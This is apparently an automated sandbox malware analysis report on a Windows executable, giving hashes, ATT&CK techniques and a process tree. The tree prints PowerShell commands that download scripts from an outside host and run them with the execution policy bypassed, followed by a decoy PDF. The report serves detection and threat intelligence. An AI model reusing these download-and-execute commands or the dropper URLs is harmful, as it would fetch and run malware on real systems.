ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799

General

Target

34c2047d0b69ba023b700c21431accc0N.exe
Size

258KB
MD5

34c2047d0b69ba023b700c21431accc0
SHA1

e34c28611707c81565cb73d8a1a46dfc3ab2495a
SHA256

ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
SHA512

a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
SSDEEP

6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3

Score

10^/10

discovery execution link pdf

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://thelustfactory.com/vns/1.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://thelustfactory.com/vns/2.ps1

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2000	powershell.exe
3016	powershell.exe
2768	powershell.exe
2872	powershell.exe

HTTP links in PDF interactive object 1 IoCs

Detects HTTP links in interactive objects within PDF files.

pdf link

resource	yara_rule
behavioral1/files/0x000700000001961c-60.dat	pdf_with_link_action

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2764	timeout.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2288	AcroRd32.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2000	powershell.exe
3016	powershell.exe
2872	powershell.exe
2768	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2288	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2288	AcroRd32.exe
2288	AcroRd32.exe
2288	AcroRd32.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1096 wrote to memory of 1476	1096	34c2047d0b69ba023b700c21431accc0N.exe	30
PID 1096 wrote to memory of 1476	1096	34c2047d0b69ba023b700c21431accc0N.exe	30
PID 1096 wrote to memory of 1476	1096	34c2047d0b69ba023b700c21431accc0N.exe	30
PID 1476 wrote to memory of 2000	1476	cmd.exe	32
PID 1476 wrote to memory of 2000	1476	cmd.exe	32
PID 1476 wrote to memory of 2000	1476	cmd.exe	32
PID 1476 wrote to memory of 3016	1476	cmd.exe	33
PID 1476 wrote to memory of 3016	1476	cmd.exe	33
PID 1476 wrote to memory of 3016	1476	cmd.exe	33
PID 1476 wrote to memory of 2872	1476	cmd.exe	34
PID 1476 wrote to memory of 2872	1476	cmd.exe	34
PID 1476 wrote to memory of 2872	1476	cmd.exe	34
PID 1476 wrote to memory of 2768	1476	cmd.exe	35
PID 1476 wrote to memory of 2768	1476	cmd.exe	35
PID 1476 wrote to memory of 2768	1476	cmd.exe	35
PID 1476 wrote to memory of 2764	1476	cmd.exe	36
PID 1476 wrote to memory of 2764	1476	cmd.exe	36
PID 1476 wrote to memory of 2764	1476	cmd.exe	36
PID 1476 wrote to memory of 2288	1476	cmd.exe	37
PID 1476 wrote to memory of 2288	1476	cmd.exe	37
PID 1476 wrote to memory of 2288	1476	cmd.exe	37
PID 1476 wrote to memory of 2288	1476	cmd.exe	37

C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe
C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe sh $MOZILLA\\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL"
1⤵
- Suspicious use of WriteProcessMemory
PID:1096
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DD7.tmp\7DD8.tmp\7DD9.bat C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe sh $MOZILLA\\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2768
- - C:\Windows\system32\timeout.exe
    timeout /t 5
    3⤵
    - Delays execution with timeout.exe
    PID:2764
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7DD7.tmp\7DD8.tmp\7DD9.bat

Filesize
712B

MD5
0e9ce5162ba7661c863a835f9d34d907

SHA1
0b351312ab57a02857753cab2287da680955f40d

SHA256
b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e

SHA512
8d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
9ebfe419a053661ac76f942a4ac8ab40

SHA1
241c9c805682e751f257adab261e23ebcaa553cb

SHA256
f3e5e2c2a3f8e4acb007fd049ebf003843a94992befd51e0c1a9e24af0b9936d

SHA512
5e18af05b46036683b5b8cb6b5cf17333e48ff85fc8bf890180705e480a2d3e4ec780dfe9276306fb9baa7a2e82e7bab24e8309610b8eabbe4cbea3e7893871e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
79d22fe1adc4829d894b90115218a5f8

SHA1
dedc5b5e4679b6eae1532d1d14dc0b5dd0aa112d

SHA256
7e96e31ae35536df08be7649b632565294497dc75375a9bcc210f2e82a637fc6

SHA512
c3d3e3bdf915d143bbad266eeb2e1187dbeb3469d200f44bff977da01e3ed9325d55c05bd53537d51ea2b8910e98fb8c448b95643af0f029aeccd3961131b2a4

Download Submit
C:\Users\Admin\AppData\Roaming\pdf.pdf

Filesize
139KB

MD5
5afaf79789a776d81ec91ccbdc9fdaba

SHA1
6703901978dcb3dbf2d9915e1d3e066cfe712b0a

SHA256
38c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511

SHA512
09253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288

Download Submit
memory/2000-15-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

Filesize
9.6MB

Download
memory/2000-13-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

Filesize
9.6MB

Download
memory/2000-14-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

Filesize
9.6MB

Download
memory/2000-12-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

Filesize
9.6MB

Download
memory/2000-16-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

Filesize
9.6MB

Download
memory/2000-11-0x000007FEF4E70000-0x000007FEF580D000-memory.dmp

Filesize
9.6MB

Download
memory/2000-10-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2000-9-0x000000001B510000-0x000000001B7F2000-memory.dmp

Filesize
2.9MB

Download
memory/2000-8-0x000007FEF512E000-0x000007FEF512F000-memory.dmp

Filesize
4KB

Download
memory/3016-22-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/3016-23-0x0000000002770000-0x0000000002778000-memory.dmp

Filesize
32KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads